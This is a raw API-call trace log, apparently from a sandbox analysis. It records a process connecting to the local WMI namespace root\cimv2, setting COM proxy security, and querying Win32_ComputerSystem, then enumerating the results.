	[0211.278] WbemLocator:IUnknown:QueryInterface (in: This=0x1c831dc0, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c628 | out: ppvObject=0x1c80c628*=0x0) returned 0x80004002
	[0211.278] WbemLocator:IUnknown:Release (This=0x1c831dc0) returned 0x3
	[0211.278] WbemLocator:IUnknown:Release (This=0x1c831dc0) returned 0x2
	[0211.278] WbemLocator:IUnknown:Release (This=0x1c831da0) returned 0x0
	[0211.278] WbemLocator:IUnknown:Release (This=0x1c831dc0) returned 0x1
	[0211.279] CoGetContextToken (in: pToken=0x1c80cb30 | out: pToken=0x1c80cb30) returned 0x0
	[0211.279] CoGetContextToken (in: pToken=0x1c80ca70 | out: pToken=0x1c80ca70) returned 0x0
	[0211.279] WbemLocator:IUnknown:AddRef (This=0x1c831dc0) returned 0x2
	[0211.279] WbemLocator:IUnknown:QueryInterface (in: This=0x1c831dc0, riid=0x1c80cbb0*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c80cb90 | out: ppvObject=0x1c80cb90*=0x1c831dc0) returned 0x0
	[0211.279] WbemLocator:IUnknown:Release (This=0x1c831dc0) returned 0x2
	[0211.279] WbemLocator:IUnknown:Release (This=0x1c831dc0) returned 0x1
	[0211.279] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c83dcd0, puCount=0x1c80cf90 | out: puCount=0x1c80cf90*=0x2) returned 0x0
	[0211.279] WbemDefPath:IWbemPath:GetText (in: This=0x1c83dcd0, lFlags=8, puBuffLength=0x1c80cf90*=0x0, pszText=0x0 | out: puBuffLength=0x1c80cf90*=0x17, pszText=0x0) returned 0x0
	[0211.279] WbemDefPath:IWbemPath:GetText (in: This=0x1c83dcd0, lFlags=8, puBuffLength=0x1c80cf90*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c80cf90*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0211.279] CoCreateInstance (in: rclsid=0x642ffff15a8*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x642ffff14d8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x1c80cc80 | out: ppv=0x1c80cc80*=0x1c831de0) returned 0x0
	[0211.280] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1c831de0, strNetworkResource="\\\\localhost\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x1c80cf10 | out: ppNamespace=0x1c80cf10*=0x1c83aec8) returned 0x0
	[0212.171] WbemLocator:IUnknown:QueryInterface (in: This=0x1c83aec8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80caf8 | out: ppvObject=0x1c80caf8*=0x1b808270) returned 0x0
	[0212.171] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x1b808270, pProxy=0x1c83aec8, pAuthnSvc=0x1c80caf0, pAuthzSvc=0x1c80caec, pServerPrincName=0x1c80cb18, pAuthnLevel=0x1c80cae8, pImpLevel=0x1c80cb04, pAuthInfo=0x1c80cb28, pCapabilites=0x1c80cb00 | out: pAuthnSvc=0x1c80caf0*=0xa, pAuthzSvc=0x1c80caec*=0x0, pServerPrincName=0x1c80cb18, pAuthnLevel=0x1c80cae8*=0x6, pImpLevel=0x1c80cb04*=0x2, pAuthInfo=0x1c80cb28, pCapabilites=0x1c80cb00*=0x1) returned 0x0
	[0212.171] WbemLocator:IUnknown:Release (This=0x1b808270) returned 0x1
	[0212.172] WbemLocator:IUnknown:QueryInterface (in: This=0x1c83aec8, riid=0x642ffff1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80ca98 | out: ppvObject=0x1c80ca98*=0x1b8082b0) returned 0x0
	[0212.172] WbemLocator:IUnknown:QueryInterface (in: This=0x1c83aec8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80ca28 | out: ppvObject=0x1c80ca28*=0x1b808270) returned 0x0
	[0212.172] WbemLocator:IClientSecurity:SetBlanket (This=0x1b808270, pProxy=0x1c83aec8, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0212.172] WbemLocator:IUnknown:Release (This=0x1b808270) returned 0x2
	[0212.172] WbemLocator:IUnknown:Release (This=0x1b8082b0) returned 0x1
	[0212.172] CoTaskMemFree (pv=0x1b81ea10) 
	[0212.172] WbemLocator:IUnknown:Release (This=0x1c831de0) returned 0x0
	[0212.173] WbemLocator:IUnknown:QueryInterface (in: This=0x1c83aec8, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c710 | out: ppvObject=0x1c80c710*=0x1b8082b0) returned 0x0
	[0212.173] WbemLocator:IUnknown:QueryInterface (in: This=0x1b8082b0, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c80c790 | out: ppvObject=0x1c80c790*=0x0) returned 0x80004002
	[0212.184] WbemLocator:IUnknown:QueryInterface (in: This=0x1b8082b0, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c80c528 | out: ppvObject=0x1c80c528*=0x0) returned 0x80004002
	[0212.449] WbemLocator:IUnknown:AddRef (This=0x1b8082b0) returned 0x3
	[0212.449] CoGetContextToken (in: pToken=0x1c80c3e0 | out: pToken=0x1c80c3e0) returned 0x0
	[0212.449] WbemLocator:IUnknown:QueryInterface (in: This=0x1b8082b0, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c3a0 | out: ppvObject=0x1c80c3a0*=0x1b808198) returned 0x0
	[0212.450] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x1b808198, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c80c3d0 | out: pCid=0x1c80c3d0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0212.450] WbemLocator:IUnknown:Release (This=0x1b808198) returned 0x3
	[0212.450] CoGetContextToken (in: pToken=0x1c80c3b0 | out: pToken=0x1c80c3b0) returned 0x0
	[0212.450] WbemLocator:IUnknown:AddRef (This=0x1b8082b0) returned 0x4
	[0212.450] WbemLocator:IUnknown:QueryInterface (in: This=0x1b8082b0, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c4c8 | out: ppvObject=0x1c80c4c8*=0x1b808280) returned 0x0
	[0212.450] WbemLocator:IUnknown:Release (This=0x1b8082b0) returned 0x4
	[0212.451] WbemLocator:IRpcOptions:Query (in: This=0x1b808280, pPrx=0x1b8082b0, dwProperty=2, pdwValue=0x1c80c538 | out: pdwValue=0x1c80c538) returned 0x80004002
	[0212.451] WbemLocator:IUnknown:Release (This=0x1b808280) returned 0x3
	[0212.451] WbemLocator:IUnknown:Release (This=0x1b8082b0) returned 0x2
	[0212.451] CoGetContextToken (in: pToken=0x1c80c8b0 | out: pToken=0x1c80c8b0) returned 0x0
	[0212.451] CoGetContextToken (in: pToken=0x1c80c7f0 | out: pToken=0x1c80c7f0) returned 0x0
	[0212.451] WbemLocator:IUnknown:AddRef (This=0x1b8082b0) returned 0x3
	[0212.451] WbemLocator:IUnknown:QueryInterface (in: This=0x1b8082b0, riid=0x1c80c930*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x1c80c910 | out: ppvObject=0x1c80c910*=0x1c83aec8) returned 0x0
	[0212.451] WbemLocator:IUnknown:Release (This=0x1b8082b0) returned 0x3
	[0212.451] WbemLocator:IUnknown:Release (This=0x1c83aec8) returned 0x2
	[0212.452] WbemLocator:IUnknown:Release (This=0x1c83aec8) returned 0x1
	[0212.452] CoGetContextToken (in: pToken=0x1c80ceb0 | out: pToken=0x1c80ceb0) returned 0x0
	[0212.452] WbemLocator:IUnknown:AddRef (This=0x1b8082b0) returned 0x2
	[0212.452] WbemLocator:IUnknown:QueryInterface (in: This=0x1b8082b0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80ca80 | out: ppvObject=0x1c80ca80*=0x1b8082b0) returned 0x0
	[0212.452] WbemLocator:IUnknown:Release (This=0x1b8082b0) returned 0x2
	[0212.452] WbemLocator:IUnknown:Release (This=0x1b8082b0) returned 0x1
	[0212.453] CoGetContextToken (in: pToken=0x1c80cb50 | out: pToken=0x1c80cb50) returned 0x0
	[0212.453] CoGetContextToken (in: pToken=0x1c80ca90 | out: pToken=0x1c80ca90) returned 0x0
	[0212.453] WbemLocator:IUnknown:AddRef (This=0x1b8082b0) returned 0x2
	[0212.453] WbemLocator:IUnknown:QueryInterface (in: This=0x1b8082b0, riid=0x1c80cbd0*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x1c80cbb0 | out: ppvObject=0x1c80cbb0*=0x1c83aec8) returned 0x0
	[0212.453] WbemLocator:IUnknown:Release (This=0x1b8082b0) returned 0x2
	[0212.453] WbemLocator:IUnknown:AddRef (This=0x1c83aec8) returned 0x3
	[0212.453] IWbemServices:ExecQuery (in: This=0x1c83aec8, strQueryLanguage="WQL", strQuery="select * from Win32_ComputerSystem", lFlags=16, pCtx=0x0, ppEnum=0x1c80d048 | out: ppEnum=0x1c80d048*=0x1c840798) returned 0x0
	[0212.459] IUnknown:QueryInterface (in: This=0x1c840798, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80cc58 | out: ppvObject=0x1c80cc58*=0x1c8407a0) returned 0x0
	[0212.460] IClientSecurity:QueryBlanket (in: This=0x1c8407a0, pProxy=0x1c840798, pAuthnSvc=0x1c80cc50, pAuthzSvc=0x1c80cc4c, pServerPrincName=0x1c80cc78, pAuthnLevel=0x1c80cc48, pImpLevel=0x1c80cc64, pAuthInfo=0x1c80cc88, pCapabilites=0x1c80cc60 | out: pAuthnSvc=0x1c80cc50*=0xa, pAuthzSvc=0x1c80cc4c*=0x0, pServerPrincName=0x1c80cc78, pAuthnLevel=0x1c80cc48*=0x6, pImpLevel=0x1c80cc64*=0x2, pAuthInfo=0x1c80cc88, pCapabilites=0x1c80cc60*=0x1) returned 0x0
	[0212.460] IUnknown:Release (This=0x1c8407a0) returned 0x1
	[0212.460] IUnknown:QueryInterface (in: This=0x1c840798, riid=0x642ffff1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80cbf8 | out: ppvObject=0x1c80cbf8*=0x1b808130) returned 0x0
	[0212.460] IUnknown:QueryInterface (in: This=0x1c840798, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80cb88 | out: ppvObject=0x1c80cb88*=0x1c8407a0) returned 0x0
	[0212.460] IClientSecurity:SetBlanket (This=0x1c8407a0, pProxy=0x1c840798, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0212.462] IUnknown:Release (This=0x1c8407a0) returned 0x2
	[0212.462] WbemLocator:IUnknown:Release (This=0x1b808130) returned 0x1
	[0212.462] CoTaskMemFree (pv=0x1b81ea70) 
	[0212.462] IUnknown:QueryInterface (in: This=0x1c840798, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c830 | out: ppvObject=0x1c80c830*=0x1b808130) returned 0x0
	[0212.462] WbemLocator:IUnknown:QueryInterface (in: This=0x1b808130, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c80c8b0 | out: ppvObject=0x1c80c8b0*=0x0) returned 0x80004002
	[0212.463] WbemLocator:IUnknown:QueryInterface (in: This=0x1b808130, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c80c648 | out: ppvObject=0x1c80c648*=0x0) returned 0x80004002
	[0212.464] WbemLocator:IUnknown:AddRef (This=0x1b808130) returned 0x3
	[0212.464] CoGetContextToken (in: pToken=0x1c80c500 | out: pToken=0x1c80c500) returned 0x0
	[0212.464] WbemLocator:IUnknown:QueryInterface (in: This=0x1b808130, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c4c0 | out: ppvObject=0x1c80c4c0*=0x1b808018) returned 0x0
	[0212.464] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x1b808018, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c80c4f0 | out: pCid=0x1c80c4f0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0212.465] WbemLocator:IUnknown:Release (This=0x1b808018) returned 0x3
	[0212.465] CoGetContextToken (in: pToken=0x1c80c4d0 | out: pToken=0x1c80c4d0) returned 0x0
	[0212.465] WbemLocator:IUnknown:AddRef (This=0x1b808130) returned 0x4
	[0212.465] WbemLocator:IUnknown:QueryInterface (in: This=0x1b808130, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c5e8 | out: ppvObject=0x1c80c5e8*=0x1b808100) returned 0x0
	[0212.465] WbemLocator:IUnknown:Release (This=0x1b808130) returned 0x4
	[0212.465] WbemLocator:IRpcOptions:Query (in: This=0x1b808100, pPrx=0x1b808130, dwProperty=2, pdwValue=0x1c80c658 | out: pdwValue=0x1c80c658) returned 0x80004002
	[0212.465] WbemLocator:IUnknown:Release (This=0x1b808100) returned 0x3
	[0212.465] WbemLocator:IUnknown:Release (This=0x1b808130) returned 0x2
	[0212.466] CoGetContextToken (in: pToken=0x1c80c9d0 | out: pToken=0x1c80c9d0) returned 0x0
	[0212.466] CoGetContextToken (in: pToken=0x1c80c910 | out: pToken=0x1c80c910) returned 0x0
	[0212.466] WbemLocator:IUnknown:AddRef (This=0x1b808130) returned 0x3
	[0212.466] WbemLocator:IUnknown:QueryInterface (in: This=0x1b808130, riid=0x1c80ca50*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c80ca30 | out: ppvObject=0x1c80ca30*=0x1c840798) returned 0x0
	[0212.466] WbemLocator:IUnknown:Release (This=0x1b808130) returned 0x3
	[0212.466] IUnknown:Release (This=0x1c840798) returned 0x2
	[0212.466] IUnknown:Release (This=0x1c840798) returned 0x1
	[0212.466] WbemLocator:IUnknown:Release (This=0x1c83aec8) returned 0x2
	[0212.467] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c83dcd0, puCount=0x1c80cff0 | out: puCount=0x1c80cff0*=0x2) returned 0x0
	[0212.467] WbemDefPath:IWbemPath:GetText (in: This=0x1c83dcd0, lFlags=4, puBuffLength=0x1c80cff0*=0x0, pszText=0x0 | out: puBuffLength=0x1c80cff0*=0x17, pszText=0x0) returned 0x0
	[0212.467] WbemDefPath:IWbemPath:GetText (in: This=0x1c83dcd0, lFlags=4, puBuffLength=0x1c80cff0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c80cff0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0212.467] CoGetContextToken (in: pToken=0x1c80cbf0 | out: pToken=0x1c80cbf0) returned 0x0
	[0212.467] CoGetContextToken (in: pToken=0x1c80cb30 | out: pToken=0x1c80cb30) returned 0x0
	[0212.467] WbemLocator:IUnknown:AddRef (This=0x1b808130) returned 0x2
	[0212.467] WbemLocator:IUnknown:QueryInterface (in: This=0x1b808130, riid=0x1c80cc70*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c80cc50 | out: ppvObject=0x1c80cc50*=0x1c840798) returned 0x0
	[0212.467] WbemLocator:IUnknown:Release (This=0x1b808130) returned 0x2
	[0212.467] IUnknown:AddRef (This=0x1c840798) returned 0x3
	[0212.467] IEnumWbemClassObject:Clone (in: This=0x1c840798, ppEnum=0x1c80d0b0 | out: ppEnum=0x1c80d0b0*=0x1c8408e8) returned 0x0
	[0212.710] IUnknown:QueryInterface (in: This=0x1c8408e8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80cd08 | out: ppvObject=0x1c80cd08*=0x1c8408f0) returned 0x0
	[0212.710] IClientSecurity:QueryBlanket (in: This=0x1c8408f0, pProxy=0x1c8408e8, pAuthnSvc=0x1c80cd00, pAuthzSvc=0x1c80ccfc, pServerPrincName=0x1c80cd28, pAuthnLevel=0x1c80ccf8, pImpLevel=0x1c80cd14, pAuthInfo=0x1c80cd38, pCapabilites=0x1c80cd10 | out: pAuthnSvc=0x1c80cd00*=0xa, pAuthzSvc=0x1c80ccfc*=0x0, pServerPrincName=0x1c80cd28, pAuthnLevel=0x1c80ccf8*=0x6, pImpLevel=0x1c80cd14*=0x2, pAuthInfo=0x1c80cd38, pCapabilites=0x1c80cd10*=0x1) returned 0x0
	[0212.710] IUnknown:Release (This=0x1c8408f0) returned 0x1
	[0212.710] IUnknown:QueryInterface (in: This=0x1c8408e8, riid=0x642ffff1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80cca8 | out: ppvObject=0x1c80cca8*=0x1b8085b0) returned 0x0
	[0212.710] IUnknown:QueryInterface (in: This=0x1c8408e8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80cc38 | out: ppvObject=0x1c80cc38*=0x1c8408f0) returned 0x0
	[0212.710] IClientSecurity:SetBlanket (This=0x1c8408f0, pProxy=0x1c8408e8, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0212.714] IUnknown:Release (This=0x1c8408f0) returned 0x2
	[0212.714] WbemLocator:IUnknown:Release (This=0x1b8085b0) returned 0x1
	[0212.714] CoTaskMemFree (pv=0x1b81e470) 
	[0212.714] IUnknown:QueryInterface (in: This=0x1c8408e8, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c8d0 | out: ppvObject=0x1c80c8d0*=0x1b8085b0) returned 0x0
	[0212.715] WbemLocator:IUnknown:QueryInterface (in: This=0x1b8085b0, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c80c950 | out: ppvObject=0x1c80c950*=0x0) returned 0x80004002
	[0212.716] WbemLocator:IUnknown:QueryInterface (in: This=0x1b8085b0, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c80c6e8 | out: ppvObject=0x1c80c6e8*=0x0) returned 0x80004002
	[0212.718] WbemLocator:IUnknown:AddRef (This=0x1b8085b0) returned 0x3
	[0212.718] CoGetContextToken (in: pToken=0x1c80c5a0 | out: pToken=0x1c80c5a0) returned 0x0
	[0212.718] WbemLocator:IUnknown:QueryInterface (in: This=0x1b8085b0, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c560 | out: ppvObject=0x1c80c560*=0x1b808498) returned 0x0
	[0212.718] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x1b808498, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c80c590 | out: pCid=0x1c80c590*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0212.718] WbemLocator:IUnknown:Release (This=0x1b808498) returned 0x3
	[0212.719] CoGetContextToken (in: pToken=0x1c80c570 | out: pToken=0x1c80c570) returned 0x0
	[0212.719] WbemLocator:IUnknown:AddRef (This=0x1b8085b0) returned 0x4
	[0212.719] WbemLocator:IUnknown:QueryInterface (in: This=0x1b8085b0, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c688 | out: ppvObject=0x1c80c688*=0x1b808580) returned 0x0
	[0212.719] WbemLocator:IUnknown:Release (This=0x1b8085b0) returned 0x4
	[0212.719] WbemLocator:IRpcOptions:Query (in: This=0x1b808580, pPrx=0x1b8085b0, dwProperty=2, pdwValue=0x1c80c6f8 | out: pdwValue=0x1c80c6f8) returned 0x80004002
	[0212.720] WbemLocator:IUnknown:Release (This=0x1b808580) returned 0x3
	[0212.720] WbemLocator:IUnknown:Release (This=0x1b8085b0) returned 0x2
	[0212.720] CoGetContextToken (in: pToken=0x1c80ca70 | out: pToken=0x1c80ca70) returned 0x0
	[0212.720] CoGetContextToken (in: pToken=0x1c80c9b0 | out: pToken=0x1c80c9b0) returned 0x0
	[0212.720] WbemLocator:IUnknown:AddRef (This=0x1b8085b0) returned 0x3
	[0212.720] WbemLocator:IUnknown:QueryInterface (in: This=0x1b8085b0, riid=0x1c80caf0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c80cad0 | out: ppvObject=0x1c80cad0*=0x1c8408e8) returned 0x0
	[0212.721] WbemLocator:IUnknown:Release (This=0x1b8085b0) returned 0x3
	[0212.721] IUnknown:Release (This=0x1c8408e8) returned 0x2
	[0212.721] IUnknown:Release (This=0x1c8408e8) returned 0x1
	[0212.721] IUnknown:Release (This=0x1c840798) returned 0x2
	[0212.721] CoGetContextToken (in: pToken=0x1c80ce70 | out: pToken=0x1c80ce70) returned 0x0
	[0212.721] CoGetContextToken (in: pToken=0x1c80cdb0 | out: pToken=0x1c80cdb0) returned 0x0
	[0212.721] WbemLocator:IUnknown:AddRef (This=0x1b8085b0) returned 0x2
	[0212.722] WbemLocator:IUnknown:QueryInterface (in: This=0x1b8085b0, riid=0x1c80cef0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c80ced0 | out: ppvObject=0x1c80ced0*=0x1c8408e8) returned 0x0
	[0212.722] WbemLocator:IUnknown:Release (This=0x1b8085b0) returned 0x2
	[0212.722] IUnknown:AddRef (This=0x1c8408e8) returned 0x3
	[0212.722] IEnumWbemClassObject:Reset (This=0x1c8408e8) returned 0x0
	[0212.724] IUnknown:Release (This=0x1c8408e8) returned 0x2
	[0212.724] CoTaskMemAlloc (cb=0x8) returned 0x1b8227a0
	[0212.724] IEnumWbemClassObject:Next (in: This=0x1c8408e8, lTimeout=-1, uCount=0x1, apObjects=0x1b8227a0, puReturned=0x1c80d0f8 | out: apObjects=0x1b8227a0*=0x1c840950, puReturned=0x1c80d0f8*=0x1) returned 0x0
	[0212.729] IUnknown:QueryInterface (in: This=0x1c840950, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c80c420 | out: ppvObject=0x1c80c420*=0x1c840950) returned 0x0
	[0212.729] IUnknown:QueryInterface (in: This=0x1c840950, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c80c4a0 | out: ppvObject=0x1c80c4a0*=0x0) returned 0x80004002
